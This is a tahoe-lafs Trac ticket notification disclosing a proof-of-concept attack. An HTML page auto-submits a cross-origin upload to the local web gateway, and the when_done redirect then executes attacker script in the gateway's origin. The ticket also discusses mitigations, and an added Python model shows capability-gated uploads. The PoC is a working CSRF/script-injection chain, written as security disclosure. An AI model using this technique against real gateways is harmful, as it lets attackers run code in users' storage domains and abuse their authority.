[tahoe-lafs-trac-stream] [tahoe-lafs] #1859: Proof-of-concept attack: Upload and execute attacker controlled js from any domain.
tahoe-lafs
trac at tahoe-lafs.org
Thu Jul 4 18:13:33 UTC 2013
#1859: Proof-of-concept attack: Upload and execute attacker controlled js from any domain.
-----------------------------+-------------------------------------------------
Reporter: nejucomo           | Owner: davidsarah
Type: defect                 | Status: new
Priority: major              | Milestone: undecided
Component: code-frontend-web | Version: 1.9.2
Resolution:                  | Keywords: security javascript same-origin capleak
Launchpad Bug:               |
-----------------------------+-------------------------------------------------
New description:
**Proof of Concept Attack**
The following proof of concept shows how an HTML file loaded from any
domain into (some) browsers with JavaScript enabled can inject an attacker
controlled script into a grid, and //then// cause the user to execute that
script in the domain of the grid:
{{{
<html>
<head>
<script>
// Attacker-controlled HTML that will be stored in the grid. The \x3c / \x3e
// escapes stop the browser from parsing the tags as part of this page.
var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY ATTACKER CODE IN MAI DOMAIN " + ' +
  'document.domain + "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';

window.onload = function () {
  // Fill the form field with the payload and submit it without any user action.
  var payload_input = document.getElementById('payload_input');
  payload_input.value = PAYLOAD;

  var the_form = document.getElementById('the_form');
  the_form.submit();
};
</script>
</head>

<body id="body">
<p>
demo attack:
</p>
<p>
This page attempts to inject an attacker controlled script into a <a
href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
this file is loaded from.
</p>

<!-- Cross-origin form POST to the local gateway. when_done=/uri/%(uri)s
     makes the gateway redirect the browser to the freshly uploaded file,
     which is then served from the gateway's own origin. -->
<form id="the_form"
      method="POST"
      action="http://127.0.0.1:3456/uri?t=upload&amp;when_done=/uri/%25(uri)s?filename=payload.html"
      enctype="multipart/form-data">
<input id="payload_input" type="text" name="file">
</form>
</body>
</html>
}}}
**Mitigations**:
There are several moving parts at work here. The {{{when_done}}}
parameter with uri substitution was very convenient.
I think an upload capability would be the most consistent and thorough
solution. Removing bits and pieces which may otherwise be useful, like
{{{when_done}}}, feels like a piecemeal defense.
Requiring CSRF tokens may be more comprehensive, but also doesn't sit well
with the rest of the capability model. (A CSRF token would be a bit like
a "make this kind of HTTP request" temporary capability.)
**Related Tickets**:
* #615 is about illicitly gaining victim capabilities; whereas this ticket
is about bootstrapping an attack and/or abusing ambient authority.
* #1215 is about adding CORS support and how that may create a
vulnerability; this script demonstrates even without CORS support similar
vulnerabilities already exist.
--
Comment (by nejucomo):
This is related to:
* #587 "Web nodes provide ambient upload authority"
* The accounting proposal - https://tahoe-lafs.org/trac/tahoe-lafs/browser/docs/proposed/accounting-overview.txt
* Note: So long as the web interface requires an explicit, non-ambient
authority for space usage, this attack vector will be less useful.
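As an added illustration of the mitigation discussed in the description and of the ambient-authority point behind #587 (constructed example code, not tahoe-lafs's gateway), the following Python models an upload endpoint in two modes: "ambient", where any POST to /uri?t=upload is accepted as in the PoC, and "cap", where an unguessable upload capability must be presented. The UploadGateway class, the upload-cap format and the file-cap placeholder are assumptions made for the example.

```python
import hashlib
import secrets
from typing import Optional

# Constructed model of a WAPI-style upload endpoint; not tahoe-lafs code.
# "ambient": any POST to /uri?t=upload is accepted (the situation in the ticket).
# "cap": the caller must present an unguessable upload capability.
class UploadGateway:
    def __init__(self, mode: str):
        assert mode in ("ambient", "cap")
        self.mode = mode
        # Hypothetical upload cap. Only the local user ever sees it, so a page
        # served from some other origin has nothing to put in its form.
        self.upload_cap = "URI:UPLOAD:" + secrets.token_urlsafe(24)
        self.stored = {}

    def post_upload(self, query: dict, body: bytes, cap: Optional[str] = None):
        """Return (status, location): 303 plus redirect target on success."""
        if self.mode == "cap" and not (cap and secrets.compare_digest(cap, self.upload_cap)):
            return 403, None  # no upload authority presented
        if query.get("t") != "upload":
            return 400, None
        # Constructed placeholder for the file cap the grid would hand back.
        file_uri = "URI:CHK:" + hashlib.sha256(body).hexdigest()[:16]
        self.stored[file_uri] = body
        when_done = query.get("when_done")
        if when_done is None:
            return 200, file_uri
        # The %(uri)s substitution from the ticket: the redirect target lies
        # inside the gateway's own origin, so uploaded HTML executes there.
        return 303, when_done % {"uri": file_uri}

# What a cross-origin page can do: submit a form. It knows no capability.
ATTACK_QUERY = {"t": "upload", "when_done": "/uri/%(uri)s?filename=payload.html"}
ATTACK_BODY = b"<html><body>attacker-controlled page</body></html>"  # constructed

def cross_origin_upload(gw: UploadGateway):
    return gw.post_upload(ATTACK_QUERY, ATTACK_BODY, cap=None)

def local_user_upload(gw: UploadGateway, body: bytes = b"constructed user file"):
    return gw.post_upload({"t": "upload"}, body, cap=gw.upload_cap)

if __name__ == "__main__":
    print(cross_origin_upload(UploadGateway("ambient")))  # 303, redirect into the gateway origin
    print(cross_origin_upload(UploadGateway("cap")))      # (403, None)
    print(local_user_upload(UploadGateway("cap")))        # 200, file cap
```

Note that the cap mode leaves when_done in place: the chain is broken at the authority step rather than by removing the convenience feature, which is the "consistent and thorough" direction the description argues for.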
--
Ticket URL: <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/1859#comment:9>
tahoe-lafs <https://tahoe-lafs.org>
secure decentralized storage